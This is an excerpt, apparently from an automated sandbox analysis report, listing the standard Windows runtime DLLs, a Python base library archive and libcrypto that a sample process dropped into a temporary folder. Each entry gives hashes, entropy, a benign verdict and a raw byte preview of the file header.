                                                                                                                                                                                                                      SHA-256:286068A999FE179EE91B289360DD76E89365900B130A50E8651A9B7ECE80B36D
                                                                                                                                                                                                                      SHA-512:08C83A729036C94148D9A5CBC03647FA2ADEA4FBA1BBB514C06F85CA804EEFBF36C909CB6EDC1171DA8D4D5E4389E15E52571BAA6987D1F1353377F509E269AB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......5....`.........................................`...E............ ...................A..............8............................................................................rdata..\...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.126809628880692
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:DPWEhWcG6SJxHW65FdQpBjSdHnhWgN7a8Wcb8W65FdQHnhWgN7a8Wbv8p2kacqnd:LWEhWP6yQpBj0HRN7reQHRN7c8pUclXM
                                                                                                                                                                                                                      MD5:EAB486E4719B916CAD05D64CD4E72E43
                                                                                                                                                                                                                      SHA1:876C256FB2AEB0B25A63C9EE87D79B7A3C157EAD
                                                                                                                                                                                                                      SHA-256:05FE96FAA8429992520451F4317FBCEBA1B17716FA2CAF44DDC92EDE88CE509D
                                                                                                                                                                                                                      SHA-512:C50C3E656CC28A2F4F6377BA24D126BDC248A3125DCA490994F8CACE0A4903E23346AE937BB5B0A333F7D39ECE42665AE44FDE2FD5600873489F3982151A0F5D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-util-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.050436266578937
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:VPWEhWcAQIqyW65FdQpBjSdHnhWgN7a8Wcx/YaWW65FdQHnhWgN7a8Wu08p2kacE:dWEhWxqEQpBj0HRN7FwQHRN7k8pUclXS
                                                                                                                                                                                                                      MD5:EDD61FF85D75794DC92877F793A2CEF6
                                                                                                                                                                                                                      SHA1:DE9F1738FC8BF2D19AA202E34512EC24C1CCB635
                                                                                                                                                                                                                      SHA-256:8ACA888849E9089A3A56FA867B16B071951693AB886843CFB61BD7A5B08A1ECE
                                                                                                                                                                                                                      SHA-512:6CEF9B256CDCA1A401971CA5706ADF395961B2D3407C1FFF23E6C16F7E2CE6D85D946843A53532848FCC087C18009C08F651C6EB38112778A2B4B33E8C64796C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......k....`.........................................`...9............ ...................A..............8............................................................................rdata..L...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-conio-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20760
                                                                                                                                                                                                                      Entropy (8bit):7.043213792651867
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:0N+WEhW+FQpBj0HRN7N7rJQHRN7YSIlexs:ZjqW1rJ8Y6e
                                                                                                                                                                                                                      MD5:22BFE210B767A667B0F3ED692A536E4E
                                                                                                                                                                                                                      SHA1:88E0FF9C141D8484B5E34EAAA5E4BE0B414B8ADF
                                                                                                                                                                                                                      SHA-256:F1A2499CC238E52D69C63A43D1E61847CF852173FE95C155056CFBD2CB76ABC3
                                                                                                                                                                                                                      SHA-512:CBEA3C690049A73B1A713A2183FF15D13B09982F8DD128546FD3DB264AF4252CCD390021DEE54435F06827450DA4BD388BD6FF11B084C0B43D50B181C928FD25
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......i....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):23832
                                                                                                                                                                                                                      Entropy (8bit):6.893758159434215
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:ODyuWEhWjlQpBj0HRN7ubJlUQHRN7sXhlhOq:qMqWuzU8lq
                                                                                                                                                                                                                      MD5:DA5E087677C8EBBC0062EAC758DFED49
                                                                                                                                                                                                                      SHA1:CA69D48EFA07090ACB7AE7C1608F61E8D26D3985
                                                                                                                                                                                                                      SHA-256:08A43A53A66D8ACB2E107E6FC71213CEDD180363055A2DC5081FE5A837940DCE
                                                                                                                                                                                                                      SHA-512:6262E9A0808D8F64E5F2DFAD5242CD307E2F5EAA78F0A768F325E65C98DB056C312D79F0B3E63C74E364AF913A832C1D90F4604FE26CC5FB05F3A5A661B12573
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................@............`.........................................`................0...................A..............8............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-environment-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.034562111482961
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:I8PWEhWck+4cW65FdQpBjSdHnhWgN7a8Wcl4zKW65FdQHnhWgN7a8W5kX5mzVEMq:9WEhWi4+QpBj0HRN71/QHRN7ckwCMllO
                                                                                                                                                                                                                      MD5:33A0FE1943C5A325F93679D6E9237FEE
                                                                                                                                                                                                                      SHA1:737D2537D602308FC022DBC0C29AA607BCDEC702
                                                                                                                                                                                                                      SHA-256:5AF7AA065FFDBF98D139246E198601BFDE025D11A6C878201F4B99876D6C7EAC
                                                                                                                                                                                                                      SHA-512:CAB7FCAA305A9ACE1F1CC7077B97526BEBC0921ADF23273E74CD42D7FE99401D4F7EDE8ECB9847B6734A13760B9EBE4DBD2465A3DB3139ED232DBEF68FB62C54
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......y....`.........................................`..."............ ...................A..............8............................................................................rdata..<...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21784
                                                                                                                                                                                                                      Entropy (8bit):7.046057210626605
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:h81nWm5CcWEhWke9HQpBj0HRN7KQhv2kQHRN7yAXOVlTnG:hOnWm5C6DMHqWKmuk8pb
                                                                                                                                                                                                                      MD5:633DCA52DA4EBAA6F4BF268822C6DC88
                                                                                                                                                                                                                      SHA1:1EBFC0F881CE338D2F66FCC3F9C1CBB94CDC067E
                                                                                                                                                                                                                      SHA-256:424FD5D3D3297A8AB1227007EF8DED5A4F194F24BD573A5211BE71937AA55D22
                                                                                                                                                                                                                      SHA-512:ED058525EE7B4CC7E12561C7D674C26759A4301322FF0B3239F3183911CE14993614E3199D8017B9BFDE25C8CB9AC0990D318BB19F3992624B39EC0F084A8DF1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......."....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20760
                                                                                                                                                                                                                      Entropy (8bit):7.011889321604509
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:eQWEhWxFQpBj0HRN7o8/QHRN7/cPcSIlexP:eWGqWo8/8/l6B
                                                                                                                                                                                                                      MD5:43BF2037BFD3FB60E1FEDAC634C6F86E
                                                                                                                                                                                                                      SHA1:959EEBE41D905AD3AFA4254A52628EC13613CF70
                                                                                                                                                                                                                      SHA-256:735703C0597DA278AF8A6359FC051B9E657627F50AD5B486185C2EF328AD571B
                                                                                                                                                                                                                      SHA-512:7042846C009EFEA45CA5FAFDC08016ECA471A8C54486BA03F212ABBA47467F8744E9546C8F33214620F97DBCC994E3002788AD0DB65B86D8A3E4FF0D8A9D0D05
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..(...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-locale-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.08402114712403
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:29DWEhWXFQpBj0HRN7lbQHRN7s8SIlexeXC:kkqWN8L6cXC
                                                                                                                                                                                                                      MD5:D51BC845C4EFBFDBD68E8CCFFDAD7375
                                                                                                                                                                                                                      SHA1:C82E580EC68C48E613C63A4C2F9974BB59182CF6
                                                                                                                                                                                                                      SHA-256:89D9F54E6C9AE1CB8F914DA1A2993A20DE588C18F1AAF4D66EFB20C3A282C866
                                                                                                                                                                                                                      SHA-512:2E353CF58AD218C3E068A345D1DA6743F488789EF7C6B96492D48571DC64DF8A71AD2DB2E5976CFD04CF4B55455E99C70C7F32BD2C0F4A8BED1D29C2DAFC17B0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......].....`.........................................`...e............ ...................A..............8............................................................................rdata..|...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):28952
                                                                                                                                                                                                                      Entropy (8bit):6.688687241998293
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:wZVacWM4Oe59Ckb1hgmLiWEhW1e9HQpBj0HRN7O2KQHRN7w3kclsHMkZT:wZVJWMq59Bb1jQuMHqWOz8Akx
                                                                                                                                                                                                                      MD5:487F72D0CF7DC1D85FA18788A1B46813
                                                                                                                                                                                                                      SHA1:0AABFF6D4EE9A2A56D40EE61E4591D4BA7D14C0D
                                                                                                                                                                                                                      SHA-256:560BAF1B87B692C284CCBB82F2458A688757231B315B6875482E08C8F5333B3D
                                                                                                                                                                                                                      SHA-512:B7F4E32F98BFDCF799331253FAEBB1FB08EC24F638D8526F02A6D9371C8490B27D03DB3412128CED6D2BBB11604247F3F22C8380B1BF2A11FB3BB92F18980185
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........,...............................................P.......%....`.........................................`....%...........@...............0...A..............8............................................................................rdata...&.......(..................@..@.rsrc........@.......,..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-process-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20760
                                                                                                                                                                                                                      Entropy (8bit):7.028263219925353
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:JitIlWEhWO5oQpBj0HRN7BXVQHRN7DEp1x09lgezq:w6paqWz8Apsm
                                                                                                                                                                                                                      MD5:54A8FCA040976F2AAC779A344B275C80
                                                                                                                                                                                                                      SHA1:EA1F01D6DCDF688EB0F21A8CB8A38F03BC777883
                                                                                                                                                                                                                      SHA-256:7E90E7ACC69ACA4591CE421C302C7F6CDF8E44F3B4390F66EC43DFF456FFEA29
                                                                                                                                                                                                                      SHA-512:CB20BED4972E56F74DE1B7BC50DC1E27F2422DBB302AECB749018B9F88E3E4A67C9FC69BBBB8C4B21D49A530CC8266172E7D237650512AAFB293CDFE06D02228
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...x............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):24344
                                                                                                                                                                                                                      Entropy (8bit):6.897926491070706
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:B42r77WEhWCFQpBj0HRN7SQHRN7oSIlexw40:B42r7DrqWS8o6x0
                                                                                                                                                                                                                      MD5:21B509D048418922B92985696710AFCA
                                                                                                                                                                                                                      SHA1:C499DD098AAB8C7E05B8B0FD55F994472D527203
                                                                                                                                                                                                                      SHA-256:FE7336D2FB3B13A00B5B4CE055A84F0957DAEFDACE94F21B88E692E54B678AC3
                                                                                                                                                                                                                      SHA-512:C517B02D4E94CF8360D98FD093BCA25E8AE303C1B4500CF4CF01F78A7D7EF5F581B99A0371F438C6805A0B3040A0E06994BA7B541213819BD07EC8C6251CB9BB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................@......~.....`.........................................`...4............0...................A..............8............................................................................rdata..H...........................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25880
                                                                                                                                                                                                                      Entropy (8bit):6.843889819511554
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:z3vAmiFVhFWEhWGqQpBj0HRN79XJQHRN7/SCMllJXq:zvYjoqW958/ga
                                                                                                                                                                                                                      MD5:120A5DC2682CD2A838E0FC0EFD45506E
                                                                                                                                                                                                                      SHA1:8710BE5D5E9C878669FF8B25B67FB2DEB32CD77A
                                                                                                                                                                                                                      SHA-256:C14F0D929A761A4505628C4EB5754D81B88AA1FDAD2154A2F2B0215B983B6D89
                                                                                                                                                                                                                      SHA-512:4330EDF9B84C541E5ED3BB672548F35EFA75C6B257C3215FC29BA6E152294820347517EC9BD6BDE38411EFA9074324A276CF0D7D905ED5DD88E906D78780760C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." ......... ...............................................@............`.........................................`...a............0...............$...A..............8............................................................................rdata..t...........................@..@.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-string-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25880
                                                                                                                                                                                                                      Entropy (8bit):6.8416401850774395
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:p5yguNvZ5VQgx3SbwA71IkFZpMHqW74W8Lipsy:p5yguNvZ5VQgx3SbwA71IipMR747fy
                                                                                                                                                                                                                      MD5:F22FACA49E4D5D80EC26ED31E7ECD0E0
                                                                                                                                                                                                                      SHA1:473BCBFB78E6A63AFD720B5CBE5C55D9495A3D88
                                                                                                                                                                                                                      SHA-256:1EB30EA95DAE91054A33A12B1C73601518D28E3746DB552D7CE120DA589D4CF4
                                                                                                                                                                                                                      SHA-512:C8090758435F02E3659D303211D78102C71754BA12B0A7E25083FD3529B3894DC3AB200B02A2899418CC6ED3B8F483D36E6C2BF86CE2A34E5FD9AD0483B73040
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." ......... ...............................................@............`.........................................`................0...............$...A..............8............................................................................rdata..............................@..@.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-time-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22296
                                                                                                                                                                                                                      Entropy (8bit):6.97368865913958
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:SPEzaWEhW/slQpBj0HRN7sVQHRN7gkclsHTyt:Y0YRqWg8jyt
                                                                                                                                                                                                                      MD5:2FD0DA47811B8ED4A0ABDF9030419381
                                                                                                                                                                                                                      SHA1:46E3F21A9BD31013A804BA45DC90CC22331A60D1
                                                                                                                                                                                                                      SHA-256:DE81C4D37833380A1C71A5401DE3AB4FE1F8856FC40D46D0165719A81D7F3924
                                                                                                                                                                                                                      SHA-512:2E6F900628809BFD908590FE1EA38E0E36960235F9A6BBCCB73BBB95C71BFD10F75E1DF5E8CF93A682E4ADA962B06C278AFC9123AB5A4117F77D1686FF683D6F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-utility-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.0800725103781765
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:JBf5WEhWye9HQpBj0HRN7tKQHRN7jsAXOVlTBr:zf5dMHqWtK87U
                                                                                                                                                                                                                      MD5:FE1096F1ADE3342F049921928327F553
                                                                                                                                                                                                                      SHA1:118FB451AB006CC55F715CDF3B5E0C49CF42FBE0
                                                                                                                                                                                                                      SHA-256:88D3918E2F063553CEE283306365AA8701E60FB418F37763B4719F9974F07477
                                                                                                                                                                                                                      SHA-512:0A982046F0C93F68C03A9DD48F2BC7AEE68B9EEBEAEA01C3566B2384D0B8A231570E232168D4608A09136BCB2B1489AF802FD0C25348F743F0C1C8955EDD41C1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......0....`.........................................`...^............ ...................A..............8............................................................................rdata..t...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\base_library.zip

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):841697
                                                                                                                                                                                                                      Entropy (8bit):5.484581034394053
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:fhidp/tosQNRs54PK4IM7Vw59bfCEnXTR32k:fhidp/tosQNRs54PK4Ip9F5
                                                                                                                                                                                                                      MD5:F4981249047E4B7709801A388E2965AF
                                                                                                                                                                                                                      SHA1:42847B581E714A407A0B73E5DAB019B104EC9AF2
                                                                                                                                                                                                                      SHA-256:B191E669B1C715026D0732CBF8415F1FF5CFBA5ED9D818444719D03E72D14233
                                                                                                                                                                                                                      SHA-512:E8EF3FB3C9D5EF8AE9065838B124BA4920A3A1BA2D4174269CAD05C1F318BC9FF80B1C6A6C0F3493E998F0587EF59BE0305BC92E009E67B82836755470BC1B13
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:PK..........!...7............._bootlocale.pycU....................................@....z...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.t...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin....A

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\libcrypto-1_1.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
